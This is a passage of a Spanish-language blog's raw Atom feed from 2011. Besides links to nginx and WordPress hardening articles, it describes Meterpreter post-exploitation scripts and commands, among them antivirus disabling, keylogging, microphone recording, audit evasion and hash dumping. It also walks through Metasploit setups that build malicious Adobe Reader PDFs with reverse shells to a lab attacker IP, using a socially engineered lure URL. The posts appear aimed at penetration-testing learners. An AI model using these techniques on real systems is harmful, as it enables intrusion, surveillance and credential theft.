&lt;a href="http://feedads.g.doubleclick.net/~a/6Ta2-QXnVS6iinuE02r9ojOkTtc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6Ta2-QXnVS6iinuE02r9ojOkTtc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/Fl_RoAKcyH8" height="1" width="1"/&gt;</content><link rel="related" href="http://www.securitybydefault.com/2011/11/tu-wordpress-intocable-con-mutex.html" title="Security By Default: Tu WordPress intocable con Mutex" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/3685929763929899752/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=3685929763929899752" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/3685929763929899752?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/3685929763929899752?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/Fl_RoAKcyH8/security-by-default-tu-wordpress.html" title="Security By Default: Tu WordPress intocable con Mutex" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/security-by-default-tu-wordpress.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEQAQX86eyp7ImA9WhRSFEs.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-9157576823635650440</id><published>2011-11-16T10:52:00.000-06:00</published><updated>2011-11-16T10:52:20.113-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-16T10:52:20.113-06:00</app:edited><title>Security By Default: Fortificación de nginx</title><content type="html">&lt;a href="http://www.securitybydefault.com/2011/11/fotificacion-de-nginx.html"&gt;Security By Default: Fortificación de nginx&lt;/a&gt;: "nginx es un popular servidor web y proxy inverso libre y gratuito que ya aloja más de 43 millones de dominios, entre los que se encuentra Wordpress, Dropbox, Facebook o TechCrunch.&lt;br /&gt;&lt;br /&gt;En esta entrada vamos a ver algunos aspectos a configurar para que su instalación sea más segura.&lt;br /&gt;"&lt;br&gt;&lt;br&gt;&lt;a style="font-size:13px" href="https://chrome.google.com/webstore/detail/pengoopmcjnbflcjbmoeodbmoflcgjlk"&gt;'via Blog this'&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-9157576823635650440?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/sA5Sw8wUSQpbSqPOiBm_-NQ0ylU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sA5Sw8wUSQpbSqPOiBm_-NQ0ylU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/sA5Sw8wUSQpbSqPOiBm_-NQ0ylU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sA5Sw8wUSQpbSqPOiBm_-NQ0ylU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/Rt13k2BF0ec" height="1" width="1"/&gt;</content><link rel="related" href="http://www.securitybydefault.com/2011/11/fotificacion-de-nginx.html" title="Security By Default: Fortificación de nginx" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/9157576823635650440/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=9157576823635650440" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/9157576823635650440?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/9157576823635650440?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/Rt13k2BF0ec/security-by-default-fortificacion-de.html" title="Security By Default: Fortificación de nginx" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/security-by-default-fortificacion-de.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkABSXo6eCp7ImA9WhRSE0U.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-8832744745665482630</id><published>2011-11-15T13:08:00.004-06:00</published><updated>2011-11-15T13:19:18.410-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-15T13:19:18.410-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="scipts con meterpreter" /><category scheme="http://www.blogger.com/atom/ns#" term="meterpreter" /><category scheme="http://www.blogger.com/atom/ns#" term="meterpreter scripts" /><title>Meterpreter Scripts</title><content type="html">Meterpreter es un Payload que se ejecuta después del proceso de explotación o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para meta-interprete y se ejecuta completamente en memoria; evitando así tener problemas con los Antivirus. &lt;br /&gt;&lt;br /&gt;En este artículo se describen algunos scripts que pueden ser utilizados a traves de este shellcode: &lt;br /&gt;&lt;br /&gt;   1. Identificar si el sistema víctima se encuentra en una maquina virtual. &lt;br /&gt;   2. Consultar la configuración de seguridad. &lt;br /&gt;   3. Habilitar el escritorio remoto en la maquina víctima. &lt;br /&gt;   4. Habilitar el servicio de Telnet. &lt;br /&gt;   5. Deshabilitar el Antivirus &lt;br /&gt;   6. Consultar la máscara de red &lt;br /&gt;   7. Modificar el archivo de HOSTS &lt;br /&gt;   8. Enumerar la información del sistema a través de wmic &lt;br /&gt;   9. Consultar información detallada de la maquina atacada, puede también capturar tokens, hashes, etc. &lt;br /&gt;   10. Consultar y capturar todo el registro Windows &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CHECKVM &lt;br /&gt;&lt;br /&gt;Permite identificar si el sistema víctima se encuentra en una maquina virtual.&lt;br /&gt;&lt;br /&gt;GETCOUNTERMEASURE &lt;br /&gt;&lt;br /&gt;Permite consultar la configuración de seguridad existente en la maquina víctima y puede deshabilitar otras características como Antivirus, Firewall, etc.&lt;br /&gt;&lt;br /&gt;GETGUI &lt;br /&gt;&lt;br /&gt;Permite habilitar el escritorio remoto en la maquina víctima, crea un usuario/password para hacer uso de la conexión.&lt;br /&gt;&lt;br /&gt;GETTELNET &lt;br /&gt;&lt;br /&gt;Permite habilitar el servicio de Telnet.&lt;br /&gt;&lt;br /&gt;KILLAV &lt;br /&gt;&lt;br /&gt;Permite Deshabilitar el Antivirus y otros sistemas de seguridad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;GET_LOCAL_SUBNETS &lt;br /&gt;&lt;br /&gt;Permite consultar la máscara de red, esto puede llegar a ser útil para el proceso de Pivoting.&lt;br /&gt;&lt;br /&gt;HOSTSEDIT &lt;br /&gt;&lt;br /&gt;Permite modificar el archivo de HOSTS.&lt;br /&gt;&lt;br /&gt;REMOTEWINENUM &lt;br /&gt;&lt;br /&gt;Permite enumerar la información del sistema a través de wmic.&lt;br /&gt;&lt;br /&gt;WINENUM &lt;br /&gt;&lt;br /&gt;Permite consultar información detallada de la maquina atacada, puede también capturar tokens, hashes, etc.&lt;br /&gt;&lt;br /&gt;SCRAPER &lt;br /&gt;&lt;br /&gt;Permite consultar y capturar todo el registro Windows de la maquina.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;**Scripts proporcionados por darkoperator    &lt;br /&gt;&lt;br /&gt;BROWSERENUM-DEV &lt;br /&gt;&lt;br /&gt;Permite consultar toda la información almacenada en el browser: Firefox, internet Explorer y Chrome. &lt;br /&gt;&lt;br /&gt;Para este caso el script fallo en su ejecución, al momento en que uds lo ejecuten se darán cuenta que es un error en los paths (falta editar dichos path en el archivo Ruby .rb). &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.darkoperator.com/meterpreter/browserenum-dev.rb"&gt;download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;DISABLE_AUDIT &lt;br /&gt;&lt;br /&gt;Permite deshabilitar los eventos de auditoría a través de la modificación de las políticas locales de seguridad en la maquina víctima. Después de eliminar los registros el script habilita de nuevo el servicio de auditoria tal y como estaba antes de la modificación. &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.darkoperator.com/meterpreter/disable_audit.rb"&gt;sownload&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;KEYLOGRECORDER &lt;br /&gt;&lt;br /&gt;Permite almacenar todos los eventos de tecleados por el usuario en la maquina victima en una base de datos sqlite, este script ya hace parte del framework de Metasploit. &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.darkoperator.com/meterpreter/keylogrecorder.rb"&gt;download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;SOUNDRECORDER &lt;br /&gt;&lt;br /&gt;Permite grabar y almacenar todo lo que se escucha a través del micrófono por una cantidad determinada de tiempo. &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.darkoperator.com/meterpreter/soundrecorder.zip"&gt;download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;WINBF &lt;br /&gt;&lt;br /&gt;Permite realizar un ataque de fuerza bruta al login de Windows a través de un escritorio remoto. &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.darkoperator.com/meterpreter/winbf.rb"&gt;download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;http://www.nyxbone.com/metasploit/MeterpreterScripts.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-8832744745665482630?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/YhQIVZonOOOdbaiV-l8NrDzTpuc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YhQIVZonOOOdbaiV-l8NrDzTpuc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/YhQIVZonOOOdbaiV-l8NrDzTpuc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YhQIVZonOOOdbaiV-l8NrDzTpuc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/zFwSY5hlYrE" height="1" width="1"/&gt;</content><link rel="related" href="http://www.nyxbone.com/metasploit/MeterpreterScripts.html" title="Meterpreter Scripts" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/8832744745665482630/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=8832744745665482630" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/8832744745665482630?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/8832744745665482630?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/zFwSY5hlYrE/meterpreter-scripts.html" title="Meterpreter Scripts" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/meterpreter-scripts.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkYEQXg9eyp7ImA9WhRSE0U.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-4838033543815687820</id><published>2011-11-15T12:38:00.005-06:00</published><updated>2011-11-15T13:08:20.663-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-15T13:08:20.663-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="meterpreter commands" /><category scheme="http://www.blogger.com/atom/ns#" term="commandos meterpreter" /><category scheme="http://www.blogger.com/atom/ns#" term="comandos meterpreter" /><title>Meterpreter Commands</title><content type="html">Meterpreter es un Payload que se ejecuta después del proceso de explotación o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para meta-interprete y se ejecuta completamente en memoria; evitando así tener problemas con los Antivirus. &lt;br /&gt;&lt;br /&gt;En este artículo se describen algunas de las características más importantes de este shellcode como son: &lt;br /&gt;&lt;br /&gt;   1. Eliminación de archivos de Log. &lt;br /&gt;   2. Captura de pantalla. &lt;br /&gt;   3. Carga y descarga de archivos. &lt;br /&gt;   4. Copiar información. &lt;br /&gt;   5. Extracción de información de configuración: Tablas de enrutamiento, tarjetas de red, registro de Windows, configuración de seguridad, archivos compartidos, configuración de firewall, etc, etc. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Core Commands   &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;BACKGROUND &lt;br /&gt;&lt;br /&gt;Ejecuta la sesión actual en segundo plano para retornar a la línea de comandos de Meterpreter, para regresar a la sesión se ejecuta el comando tradicional (sessions –i 1).&lt;br /&gt;&lt;br /&gt;MIGRATE &lt;br /&gt;&lt;br /&gt;Permite migrarse a otro proceso en la maquina víctima.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;File Systems Commands   &lt;br /&gt;&lt;br /&gt;LS &lt;br /&gt;&lt;br /&gt;Permite visualizar los archivos en el directorio remoto actual.&lt;br /&gt;&lt;br /&gt;DOWNLOAD &lt;br /&gt;&lt;br /&gt;Permite descargar un archivo de la maquina atacada, es necesario hacer uso del back-slash doble en la ruta del mismo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;UPLOAD &lt;br /&gt;&lt;br /&gt;Permite cargar un archivo en una ruta especifica, de la misma manera que el comando download es necesario hacer uso del doble slash al momento de indicar la ruta.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SEARCH &lt;br /&gt;&lt;br /&gt;Permite buscar archivos en la maquina víctima, además:&lt;br /&gt;&lt;br /&gt;1. Permite indicar el tipo de archivo. &lt;br /&gt;&lt;br /&gt;2. Permite indicar la ruta donde se quiere realizar la búsqueda.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Networking Commads   &lt;br /&gt;&lt;br /&gt;IPCONFIG &lt;br /&gt;&lt;br /&gt;Permite visualizar todas la información de todas tarjetas de red existentes en la maquina atacada&lt;br /&gt;&lt;br /&gt;ROUTE &lt;br /&gt;&lt;br /&gt;Permite consultar y modificar la tabla de enrutamiento.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;System Commads   &lt;br /&gt;&lt;br /&gt;EXECUTE &lt;br /&gt;&lt;br /&gt;Permite ejecutar un comando.&lt;br /&gt;&lt;br /&gt;GETPRIVS &lt;br /&gt;&lt;br /&gt;Permite obtener tantos privilegios de administración como sea posible.&lt;br /&gt;&lt;br /&gt;GETUID &lt;br /&gt;&lt;br /&gt;Permite consultar el tipo de usuario que la maquina victima esta ejecutando.&lt;br /&gt;&lt;br /&gt;PS &lt;br /&gt;&lt;br /&gt;Permite consultar todos los procesos que están en ejecución.&lt;br /&gt;&lt;br /&gt;SHELL &lt;br /&gt;&lt;br /&gt;Permite obtener un Shell, o línea de comando.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SYSINFO &lt;br /&gt;&lt;br /&gt;Permite obtener información del sistema remoto como: &lt;br /&gt;&lt;br /&gt;1. Nombre de la maquina. &lt;br /&gt;&lt;br /&gt;2. Sistema Operativo. &lt;br /&gt;&lt;br /&gt;3. Tipo de arquitectura. &lt;br /&gt;&lt;br /&gt;4. Lenguaje del sistema operativo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;User Interface Commads   &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ENUMDESKTOPS &lt;br /&gt;&lt;br /&gt;Permite consultar todas las sesiones (o escritorios).&lt;br /&gt;&lt;br /&gt;IDLETIME &lt;br /&gt;&lt;br /&gt;Permite consultar el tiempo en el que el usuario de la maquina victima ha estado ausente.&lt;br /&gt;&lt;br /&gt;SCREENSHOT &lt;br /&gt;&lt;br /&gt;Permite extraer una imagen del escritorio remoto.&lt;br /&gt;&lt;br /&gt;UICTL &lt;br /&gt;&lt;br /&gt;Permite controlar algunos de los componentes del sistema afectado.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Password Database Commads   &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HASHDUMP &lt;br /&gt;&lt;br /&gt;Permite consultar el contenido del la base de datos SAM en sistemas Windows.&lt;br /&gt;&lt;br /&gt;http://www.nyxbone.com/metasploit/Meterpreter.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-4838033543815687820?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/GfIXde0acv-XNA63zNUh9yTlnnw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GfIXde0acv-XNA63zNUh9yTlnnw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/GfIXde0acv-XNA63zNUh9yTlnnw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GfIXde0acv-XNA63zNUh9yTlnnw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/5EpFwEkigoA" height="1" width="1"/&gt;</content><link rel="related" href="http://www.nyxbone.com/metasploit/Meterpreter.html" title="Meterpreter Commands" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/4838033543815687820/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=4838033543815687820" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/4838033543815687820?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/4838033543815687820?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/5EpFwEkigoA/meterpreter-commands.html" title="Meterpreter Commands" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/meterpreter-commands.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Dk4MQnk6eyp7ImA9WhRSE0w.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-2437451456764718046</id><published>2011-11-14T17:50:00.006-06:00</published><updated>2011-11-14T17:56:23.713-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-14T17:56:23.713-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pdf malicioso metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="psf malicioso" /><title>Adobe Collab.getIcon() Buffer Overflow</title><content type="html">Este modulo explota una vulnerabilidad del tipo buffer overflow en Adobe Reader y Adobe Acrobat. Entre las versiones afectadas se incluyen &lt; 7.1.1, &lt; 8.1.3 y &lt; 9.1. &lt;br /&gt;&lt;br /&gt;Creando un archivo pdf especial que contenga un llamado malformado a la función Collab.getIcon() podría permitir al atacante la ejecución de código arbitrario. &lt;br /&gt;&lt;br /&gt;Target: 0 - Adobe Reader Universal (JS Heap Spray) (default) &lt;br /&gt;&lt;br /&gt;Desarrollado por:&lt;br /&gt;* MC &lt; mc [at] metasploit.com &gt;&lt;br /&gt;* Didier Stevens &lt; didier.stevens [at] gmail.com &gt;&lt;br /&gt;* jduck &lt; jduck [at] metasploit.com &gt; &lt;br /&gt;&lt;br /&gt;Se definen las características del exploit con una conexión reversa tcp a la maquina atacante con dirección IP: 192.168.100.228&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.nyxbone.com/images/articulos/metasploit/adobe_geticon/1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 309px;" src="http://www.nyxbone.com/images/articulos/metasploit/adobe_geticon/1.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Se ejecuta el exploit de manera que este queda a la espera en el puerto 8080, para que este se ejecute en la maquina víctima se debe incitar a la persona atacada ya sea por medio de ingeniería social, email, etc. a que consulte la siguiente dirección &lt;br /&gt;&lt;br /&gt;http://192.168.100.228:8080/cnoqwJeKZyTO &lt;br /&gt;&lt;br /&gt;Cabe mencionar que la parte “cnoqwJeKZyTO” de la URL es totalmente configurable y se puede modificar desde las opciones del exploit.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.nyxbone.com/images/articulos/metasploit/adobe_geticon/2.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 410px; height: 104px;" src="http://www.nyxbone.com/images/articulos/metasploit/adobe_geticon/2.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;El siguiente es simplemente esperar para que el servidor Web del atacante sea visitado con la versión vulnerable y de esta forma se obtiene la sesión meterpreter.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.nyxbone.com/images/articulos/metasploit/adobe_geticon/3.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 450px; height: 218px;" src="http://www.nyxbone.com/images/articulos/metasploit/adobe_geticon/3.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;http://www.nyxbone.com/metasploit/adobe_geticon.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2437451456764718046?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/DXEQBWa40FGIDvFmKU4Ni9avu24/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DXEQBWa40FGIDvFmKU4Ni9avu24/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/DXEQBWa40FGIDvFmKU4Ni9avu24/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DXEQBWa40FGIDvFmKU4Ni9avu24/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/t7UMglp_e6Q" height="1" width="1"/&gt;</content><link rel="related" href="http://www.nyxbone.com/metasploit/adobe_geticon.html" title="Adobe Collab.getIcon() Buffer Overflow" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/2437451456764718046/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=2437451456764718046" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2437451456764718046?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2437451456764718046?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/t7UMglp_e6Q/adobe-collabgeticon-buffer-overflow.html" title="Adobe Collab.getIcon() Buffer Overflow" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/adobe-collabgeticon-buffer-overflow.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Dk4DQn05eCp7ImA9WhRSEkQ.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-1161790779853116787</id><published>2011-11-14T12:01:00.007-06:00</published><updated>2011-11-14T12:22:53.320-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-14T12:22:53.320-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pdf metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="msfconsole acrobat reader" /><category scheme="http://www.blogger.com/atom/ns#" term="acrobat reader" /><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit adobe" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit hack acrobat reader" /><category scheme="http://www.blogger.com/atom/ns#" term="acrobat reader maligno" /><category scheme="http://www.blogger.com/atom/ns#" term="acrobat metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="pdf malicioso" /><title>Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow</title><content type="html">Este modulo explota una vulnerabilidad en el gestor de tablas Smart INdependent Glyplets (SING) que se encuentra en las versiones 8.2.4 y 9.3.4 de Adobe Reader. Se asume que las versiones anteriores también son vulnerables. &lt;br /&gt;&lt;br /&gt;Target: 0 - Automatic (default) &lt;br /&gt;&lt;br /&gt;Desarrollado por:&lt;br /&gt;* Unknown &lt; &gt; &lt;br /&gt;* &lt; [at] sn0wfl0w &gt;&lt;br /&gt;* &lt; [at] vicheck &gt;&lt;br /&gt;* jduck &lt; jduck [at] metasploit.com &gt; &lt;br /&gt;&lt;br /&gt;Se definen las opciones necesarias para la ejecución del exploit, la idea es crear un archivo pdf (que para este caso se llamo manual.pdf) el cual tendrá el Payload meterpreter:reverce_tcp que nos permitirá realizar la conexión con el atacante con dirección IP: 192.168.2.115 a través del puerto 4444.&lt;br /&gt;&lt;br /&gt;Al ejecutar el exploit se crea el archivo pdf&lt;br /&gt;&lt;br /&gt;Para permitir la conexión reversa proveniente desde la victima hacemos uso del exploit multi/handler el cual escucha todas las peticiones que lleguen al puerto 4444 de la maquina atacante. &lt;br /&gt;&lt;br /&gt;Como se puede observar se establece una conexión con la maquina victima de dirección IP: 192.168.2.X y se obtiene una sesión meterpreter.&lt;br /&gt;&lt;br /&gt;VIDEO: &lt;a href="http://www.youtube.com/watch?v=VKLbFhdbSwM"&gt;AQUI&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe width="425" height="349" src="http://www.youtube.com/embed/VKLbFhdbSwM?hl=es&amp;fs=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-1161790779853116787?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/H-pieXClfVcKu9sgF4VNQzMC0XE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/H-pieXClfVcKu9sgF4VNQzMC0XE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/H-pieXClfVcKu9sgF4VNQzMC0XE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/H-pieXClfVcKu9sgF4VNQzMC0XE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/rsx7cIS91j0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/1161790779853116787/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=1161790779853116787" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/1161790779853116787?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/1161790779853116787?v=2" /><link rel="alternate" type="text/html" 